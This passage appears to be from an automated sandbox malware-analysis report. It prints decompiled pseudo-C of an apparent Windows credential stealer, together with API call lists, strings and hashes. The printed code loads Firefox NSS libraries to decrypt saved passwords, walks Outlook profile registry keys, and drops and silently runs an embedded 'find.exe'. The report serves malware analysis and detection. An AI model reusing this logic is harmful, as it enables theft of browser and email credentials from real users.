							E00255A2D(_v24);
							E00255A2D(_v28);
							E00255A2D(_v32);
							E00255A2D(_v36);
							E00255A2D(_v16);
							E00255A2D(_v20);
							E00255A2D(_v40);
							E00255A2D(_a4);
							return _t158;
						}
						E00253264( &_v20,  &_v8);
						E00255A2D(_v8);
						goto L9;
					}
				}
				E00253264( &_v16,  &_v8);
				E00255A2D(_v8);
				goto L5;
			}



















                                      0x0025a324
                                      0x0025a33c
                                      0x0025a33e
                                      0x0025a342
                                      0x0025a352
                                      0x0025a35b
                                      0x0025a369
                                      0x0025a375
                                      0x0025a382
                                      0x0025a38e
                                      0x0025a39b
                                      0x0025a3a7
                                      0x0025a3b4
                                      0x0025a3c0
                                      0x0025a3cd
                                      0x0025a3d9
                                      0x0025a3e6
                                      0x0025a3f2
                                      0x0025a3ff
                                      0x0025a40b
                                      0x0025a418
                                      0x0025a41f
                                      0x0025a420
                                      0x0025a423
                                      0x0025a42a
                                      0x0025a441
                                      0x0025a451
                                      0x00000000
                                      0x00000000
                                      0x0025a456
                                      0x0025a45a
                                      0x0025a45f
                                      0x0025a466
                                      0x0025a469
                                      0x00000000
                                      0x0025a46b
                                      0x0025a481
                                      0x0025a481
                                      0x0025a488
                                      0x0025a49d
                                      0x0025a4ad
                                      0x00000000
                                      0x00000000
                                      0x0025a4b2
                                      0x0025a4b5
                                      0x0025a4ba
                                      0x0025a4c3
                                      0x00000000
                                      0x00000000
                                      0x0025a4db
                                      0x0025a4e9
                                      0x0025a4f4
                                      0x0025a4ff
                                      0x0025a50a
                                      0x0025a510
                                      0x0025a512
                                      0x0025a51e
                                      0x0025a530
                                      0x0025a538
                                      0x0025a53e
                                      0x0025a540
                                      0x0025a546
                                      0x0025a55c
                                      0x0025a56f
                                      0x0025a585
                                      0x0025a598
                                      0x0025a5ab
                                      0x0025a5be
                                      0x0025a5d1
                                      0x0025a5e4
                                      0x0025a5ef
                                      0x0025a5fd
                                      0x0025a605
                                      0x0025a605
                                      0x0025a540
                                      0x0025a538
                                      0x0025a609
                                      0x0025a611
                                      0x0025a619
                                      0x0025a621
                                      0x0025a629
                                      0x0025a631
                                      0x0025a639
                                      0x0025a641
                                      0x0025a64c
                                      0x0025a64c
                                      0x0025a4ce
                                      0x0025a4d6
                                      0x00000000
                                      0x0025a4d6
                                      0x0025a469
                                      0x0025a474
                                      0x0025a47c
                                      0x00000000

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0025A352
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0025A35B
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025309F: wsprintfW.USER32 ref: 002530BA
                                      • PathFileExistsW.SHLWAPI(00259406), ref: 0025A449
                                      • PathFileExistsW.SHLWAPI(00259406), ref: 0025A4A5
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A4E4
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A4EF
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A4FA
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A505
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A510
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0025A5FD
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                      • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                      • API String ID: 410702425-850564384
                                      • Opcode ID: cac963d90d9d3469b0a2a21ef7c5131b9ad6b3508b2cca23c0242f79c562742f
                                      • Instruction ID: 366dd6eb6b575cd4c2019eacfb979316250e91ffdc72c0079be9a736aa65e9f5
                                      • Opcode Fuzzy Hash: cac963d90d9d3469b0a2a21ef7c5131b9ad6b3508b2cca23c0242f79c562742f
                                      • Instruction Fuzzy Hash: 0A913071A20A19EBCF08EFA0D89A9EDB775BF14342F104129E915A7191DB30AF6CCF54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025822F, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 229windowstringregistryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E0025822F(void* __eflags, void* _a4) {
				short _v544;
				char _v696;
				short _v704;
				intOrPtr _v720;
				struct _WNDCLASSW _v760;
				void* _v784;
				struct tagMSG _v788;
				struct _SYSTEMTIME _v804;
				void* _v808;
				struct HINSTANCE__* _v812;
				long _v820;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t68;
				intOrPtr _t73;
				struct HWND__* _t77;
				int _t81;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t107;
				void* _t115;
				void* _t121;
				struct HINSTANCE__* _t122;
				struct HWND__* _t123;
				intOrPtr _t125;
				signed int _t126;
				signed int _t132;
				intOrPtr _t135;
				intOrPtr _t138;
				void* _t146;
				void* _t147;
				long _t151;
				void* _t156;
				void* _t157;
				signed int _t159;
				signed int _t160;
				void* _t162;
				signed int _t163;
				void* _t168;

				_t122 = GetModuleHandleA(0);
				_v804.wSecond = _t122;
				_v788.hwnd = _v788.hwnd & 0;
				_t126 = 0xa;
				memset( &(_v760.hIcon), 0, _t126 << 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t54 =  *0x266690; // 0x0
				_t151 = 0;
				E00251052(_t54 + 0x210, 0, 0x800);
				_t57 =  *0x266690; // 0x0
				E00251052(_t57 + 0x10, 0, 0x208);
				_t60 =  *0x266690; // 0x0
				_t168 = (_t163 & 0xfffffff8) - 0x314 + 0x24;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t60 + 0x10, _t147, _t157, _t121);
				_t62 =  *0x266690; // 0x0
				lstrcatW(_t62 + 0x10, L"\\Microsoft Vision\\");
				_t65 =  *0x266690; // 0x0
				CreateDirectoryW(_t65 + 0x10, 0);
				_t68 =  *0x266690; // 0x0
				_t171 =  *((intOrPtr*)(_t68 + 0xa14));
				if( *((intOrPtr*)(_t68 + 0xa14)) != 0) {
					E00251052( &_v544, 0, 0x208);
					_t107 =  *0x266690; // 0x0
					_t168 = _t168 + 0xc;
					lstrcpyW( &_v544, _t107 + 0x10);
					lstrcatW( &_v544, "*");
					E00253412(_t168,  &_v544);
					_t115 = E0025DEC5( &(_v760.lpszClassName), _t171, 0);
					_t125 =  *0x266690; // 0x0
					_t156 = _t115;
					_t13 = _t125 + 0xa18; // 0xa18
					E00251815(_t13, _t171);
					_t162 = 0;
					if( *((intOrPtr*)(_t156 + 8)) > 0) {
						do {
							_t168 = _t168 - 0x18;
							E00251862(_t156, _t168, _t162);
							_t15 = _t125 + 0xa18; // 0xa18
							E00251716(_t15);
							_t162 = _t162 + 1;
						} while (_t162 <  *((intOrPtr*)(_t156 + 8)));
					}
					_t143 = _v720;
					if(_v720 != 0) {
						E00251A75(_t143, _t143);
					}
					_t122 = _v812;
					_t151 = 0;
				}
				_t146 = 4;
				_t159 = E002532D4( &_v812, _t146, 0);
				E00253162(E00253297( &_v808, _t146, 0, L"ExplorerIdentifier"), 0, _t159);
				E00255A2D(_v820);
				_t73 =  *0x266690; // 0x0
				_v820 = _t151;
				if( *((intOrPtr*)(_t73 + 0xa14)) != _t151) {
					GetLocalTime( &_v804);
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t135 =  *0x266690; // 0x0
					_t168 = _t168 + 0x20;
					_t33 = _t135 + 0x10; // 0x10
					E00253297(E00253297(_t135 + 0xc, _t146, _t135 + 0xc, _t33), _t146, _t135 + 0xc,  &_v696);
					_t102 =  *0x266690; // 0x0
					_t103 = CreateFileW( *(_t102 + 0xc), 0x10000000, 1, _t151, 2, 0x80, _t151);
					_t138 =  *0x266690; // 0x0
					 *(_t138 + 4) = _t103;
					CloseHandle(_t103);
				}
				_v760.lpszClassName = _v808;
				_v760.lpfnWndProc = E00257CB3;
				_v760.hInstance = _t122;
				RegisterClassW( &_v760);
				_t77 = CreateWindowExW(_t151, _v760.lpszClassName, _t151, _t151, _t151, _t151, _t151, _t151, 0xfffffffd, _t151, _t122, _a4);
				_t132 = 7;
				_t123 = _t77;
				memset( &_v788, 0, _t132 << 2);
				_t81 = GetMessageA( &_v788, _t123, 0, 0);
				if(_t81 == 0) {
					L12:
					_t160 = _v788.wParam;
				} else {
					_t160 = _t159 | 0xffffffff;
					while(_t81 != _t160) {
						TranslateMessage( &_v788);
						DispatchMessageA( &_v788);
						_t81 = GetMessageA( &_v788, _t123, 0, 0);
						if(_t81 != 0) {
							continue;
						} else {
							goto L12;
						}
						goto L13;
					}
				}
				L13:
				E00255A2D(_v808);
				return _t160;
			}













































                                      0x00258246
                                      0x0025824e
                                      0x00258252
                                      0x00258258
                                      0x00258259
                                      0x0025825f
                                      0x00258265
                                      0x00258266
                                      0x00258267
                                      0x00258268
                                      0x0025826d
                                      0x00258276
                                      0x0025827b
                                      0x0025828d
                                      0x00258292
                                      0x00258297
                                      0x002582a3
                                      0x002582a9
                                      0x002582bd
                                      0x002582bf
                                      0x002582c9
                                      0x002582cf
                                      0x002582d4
                                      0x002582da
                                      0x002582ee
                                      0x002582f3
                                      0x002582f8
                                      0x00258307
                                      0x0025831a
                                      0x00258327
                                      0x00258330
                                      0x00258335
                                      0x0025833b
                                      0x0025833e
                                      0x00258344
                                      0x00258349
                                      0x0025834e
                                      0x00258350
                                      0x00258350
                                      0x00258359
                                      0x0025835e
                                      0x00258364
                                      0x00258369
                                      0x0025836a
                                      0x00258350
                                      0x0025836f
                                      0x00258375
                                      0x00258378
                                      0x00258378
                                      0x0025837d
                                      0x00258381
                                      0x00258381
                                      0x00258385
                                      0x00258398
                                      0x002583a2
                                      0x002583ab
                                      0x002583b0
                                      0x002583b5
                                      0x002583bf
                                      0x002583ca
                                      0x00258401
                                      0x00258407
                                      0x00258414
                                      0x00258418
                                      0x00258426
                                      0x0025842b
                                      0x00258443
                                      0x00258449
                                      0x00258450
                                      0x00258453
                                      0x00258453
                                      0x0025845d
                                      0x00258466
                                      0x0025846e
                                      0x00258472
                                      0x0025848d
                                      0x00258495
                                      0x00258496
                                      0x002584a0
                                      0x002584ae
                                      0x002584b2
                                      0x002584e1
                                      0x002584e1
                                      0x002584b4
                                      0x002584b4
                                      0x002584b7
                                      0x002584c0
                                      0x002584cb
                                      0x002584db
                                      0x002584df
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x002584df
                                      0x002584b7
                                      0x002584e5
                                      0x002584e9
                                      0x002584f6

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00258240
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 002582A3
                                      • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 002582BD
                                      • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 002582C9
                                      • lstrcpyW.KERNEL32(?,-00000010), ref: 00258307
                                      • lstrcatW.KERNEL32(?,00262928), ref: 0025831A
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025DEC5: FindFirstFileW.KERNEL32(?,?), ref: 0025DEF2
                                      • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 002583CA
                                      • wsprintfW.USER32 ref: 00258401
                                      • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00258443
                                      • CloseHandle.KERNEL32(00000000), ref: 00258453
                                      • RegisterClassW.USER32 ref: 00258472
                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,?), ref: 0025848D
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 002584AE
                                      • TranslateMessage.USER32(?), ref: 002584C0
                                      • DispatchMessageA.USER32(?), ref: 002584CB
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 002584DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                      • API String ID: 2678186124-2372768292
                                      • Opcode ID: 7c5892018f3be5e874edf7f0b006b067f1d2a9e21c88660d8ae69132a7d7156f
                                      • Instruction ID: ab4405838359cf2033fae04ecd6b3ba45b407de0a2b5d4152c414f7e036b82bd
                                      • Opcode Fuzzy Hash: 7c5892018f3be5e874edf7f0b006b067f1d2a9e21c88660d8ae69132a7d7156f
                                      • Instruction Fuzzy Hash: A1719F72514300ABD714DB64EC4DFABB7ECFB88701F008919F958E7291DA74E928CBA5
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      Function 00258D7E, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160registrystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00258D7E(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				short _v4116;
				short _v8212;
				short _v12308;
				long _t68;
				int _t74;
				intOrPtr _t75;
				void* _t76;
				short* _t80;

				_t76 = __edx;
				_t75 = __ecx;
				E00251130(0x3014, __ecx);
				_v20 = _t75;
				_t74 = 0;
				E00251052( &_v4116, 0, 0x800);
				E00251052( &_v8212, 0, 0x800);
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
					if(__eflags != 0) {
						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
						if(__eflags != 0) {
							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
							if(__eflags != 0) {
								L15:
								__eflags = 0;
								return 0;
							}
							_push(_t80);
							L8:
							lstrcpyW( &_v4116, ??);
							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
								goto L15;
							}
							if(_v16 <= _t74) {
								L14:
								return 1;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_v12 = 0x800;
								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
									goto L15;
								}
								RegCloseKey(_v8);
								lstrcpyW( &_v8212,  &_v4116);
								lstrcatW( &_v8212, "\\");
								lstrcatW( &_v8212,  &_v12308);
								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
								_t90 = _t68;
								if(_t68 != 0) {
									goto L15;
								}
								_push(_t75);
								_t75 = _v20;
								E00258F40(_t75, _t76, _t90, _v8);
								RegCloseKey(_v8);
								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
									goto L15;
								}
								_t74 = _t74 + 1;
								if(_t74 < _v16) {
									continue;
								}
								goto L14;
							}
							goto L15;
						}
						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L8;
					}
					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L8;
				}
				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L8;
			}















                                      0x00258d7e
                                      0x00258d7e
                                      0x00258d86
                                      0x00258d93
                                      0x00258d97
                                      0x00258da1
                                      0x00258db2
                                      0x00258dd9
                                      0x00258df4
                                      0x00258df6
                                      0x00258e11
                                      0x00258e13
                                      0x00258e22
                                      0x00258e2f
                                      0x00258e31
                                      0x00258f39
                                      0x00258f39
                                      0x00000000
                                      0x00258f39
                                      0x00258e37
                                      0x00258e38
                                      0x00258e45
                                      0x00258e63
                                      0x00000000
                                      0x00000000
                                      0x00258e6c
                                      0x00258f34
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00258e72
                                      0x00258e72
                                      0x00258e74
                                      0x00258e96
                                      0x00000000
                                      0x00000000
                                      0x00258e9f
                                      0x00258eb3
                                      0x00258ec1
                                      0x00258ed5
                                      0x00258ef2
                                      0x00258ef4
                                      0x00258ef6
                                      0x00000000
                                      0x00000000
                                      0x00258ef8
                                      0x00258efc
                                      0x00258eff
                                      0x00258f07
                                      0x00258f28
                                      0x00000000
                                      0x00000000
                                      0x00258f2a
                                      0x00258f2e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00258f2e
                                      0x00000000
                                      0x00258e72
                                      0x00258e15
                                      0x00000000
                                      0x00258e15
                                      0x00258df8
                                      0x00000000
                                      0x00258df8
                                      0x00258ddb
                                      0x00000000

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00258DD5
                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00258DF2
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00258E45
                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00258E5B
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 00258E8E
                                      • RegCloseKey.ADVAPI32(?), ref: 00258E9F
                                      • lstrcpyW.KERNEL32(?,?), ref: 00258EB3
                                      • lstrcatW.KERNEL32(?,00262644), ref: 00258EC1
                                      • lstrcatW.KERNEL32(?,?), ref: 00258ED5
                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00258EF2
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00258F07
                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00258F24
                                      Strings
                                      • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258E22, 00258E27, 00258E37
                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258E05, 00258E15
                                      • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258DCB
                                      • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258DDB
                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258DE8, 00258DF8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                      • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                      • API String ID: 1891545080-2020977430
                                      • Opcode ID: d69b25524cfaa4e89aaf118b95a0e266b2a047a0f88e45901191398e71046f5a
                                      • Instruction ID: ace5e5ccd9b16e41dba988b91baae85bfb78a976d2191cb590215e00a10cc1ec
                                      • Opcode Fuzzy Hash: d69b25524cfaa4e89aaf118b95a0e266b2a047a0f88e45901191398e71046f5a
                                      • Instruction Fuzzy Hash: E84121B292011DFEEB10DAA1CC45EFB777CEB15385F1004A5B905F2041EAB49EA8DB74
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00260E40, Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 124filestringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00260E40(void* __ecx, void* __eflags, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t37;
				void* _t39;
				struct HRSRC__* _t80;
				void* _t83;

				_t75 =  *_a4;
				_t67 = __ecx + 4;
				_v8 = __ecx + 4;
				E00253264(_t67, E0025FC1E( &_a4,  *_a4 + 4,  *_t75));
				E00255A2D(_a4);
				_t80 = FindResourceW(0, 0x67, L"WM_FIND");
				_t37 = LoadResource(0, _t80);
				_a4 = SizeofResource(0, _t80);
				_t39 = LockResource(_t37);
				E00251052( &_v1096, 0, 0x400);
				E00251052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t83, _t39, _a4,  &_v12, 0);
				CloseHandle(_t83);
				E00251052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}













                                      0x00260e4f
                                      0x00260e51
                                      0x00260e57
                                      0x00260e68
                                      0x00260e70
                                      0x00260e85
                                      0x00260e89
                                      0x00260e9a
                                      0x00260e9d
                                      0x00260eb4
                                      0x00260ec3
                                      0x00260ed9
                                      0x00260eed
                                      0x00260efb
                                      0x00260f09
                                      0x00260f2b
                                      0x00260f36
                                      0x00260f3d
                                      0x00260f50
                                      0x00260f6d
                                      0x00260f79
                                      0x00260f80
                                      0x00260f8c
                                      0x00260f93
                                      0x00260f96
                                      0x00260f9c
                                      0x00260fa2
                                      0x00260fa7
                                      0x00260fac
                                      0x00260faf
                                      0x00260fb2
                                      0x00260fb5
                                      0x00260fb8
                                      0x00260fc5

                                      APIs
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      • FindResourceW.KERNEL32(00000000,00000067,WM_FIND), ref: 00260E7F
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00260E89
                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00260E93
                                      • LockResource.KERNEL32(00000000), ref: 00260E9D
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00260ED9
                                      • lstrcatA.KERNEL32(?,find.exe), ref: 00260EED
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00260EFB
                                      • lstrcatA.KERNEL32(?,find.db), ref: 00260F09
                                      • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 00260F24
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00260F36
                                      • CloseHandle.KERNEL32(00000000), ref: 00260F3D
                                      • wsprintfA.USER32 ref: 00260F6D
                                      • ShellExecuteExA.SHELL32(0000003C), ref: 00260FBB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFindFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                      • String ID: -w %ws -d C -f %s$<$@$WM_FIND$find.db$find.exe
                                      • API String ID: 2851928664-3107137372
                                      • Opcode ID: 76cef3aa66f7ad415dab0f50cde896e8b2481045ef9f4eca6a6297a0062c4867
                                      • Instruction ID: 6fd3c5cbbf65e6b3a514ab8bec61c848dd446035cbac8a8ca2e48489ff05e92b
                                      • Opcode Fuzzy Hash: 76cef3aa66f7ad415dab0f50cde896e8b2481045ef9f4eca6a6297a0062c4867
                                      • Instruction Fuzzy Hash: E3414DB1900218ABDB10DBA4DD89FDEBBBCFF45304F104196FA09A3151DAB05A558FA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025C67E, Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237registryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025C67E(void* __edx, char _a4, char _a8) {
				void* _v12;
				char _v16;
				int _v20;
				char _v36;
				void _v44;
				void* _t51;
				int _t56;
				int _t70;
				void* _t104;
				signed int _t115;
				void* _t161;
				void* _t162;
				void* _t163;
				int _t172;

				_t161 = __edx;
				InitializeCriticalSection( &_v44);
				_t115 = 6;
				DeleteCriticalSection(memcpy(0x267cd8,  &_v44, _t115 << 2));
				EnterCriticalSection(0x267cd8);
				_t167 = _a4;
				_t111 = _a8;
				 *0x267d38 = _a4;
				 *0x267d2c = 0x266cb8;
				 *0x267d28 = _a8;
				if(E0025C1A0(_t161) == 0) {
					_t51 = E0025D4B8();
					__eflags = _t51 - 6;
					if(_t51 < 6) {
						L14:
						E00254B53(_t167, E002547F1( &_v36, 2, 0x267d30, 0x267d34));
						E002547CE( &_v36);
						LeaveCriticalSection(0x267cd8);
						__eflags = 0;
						return 0;
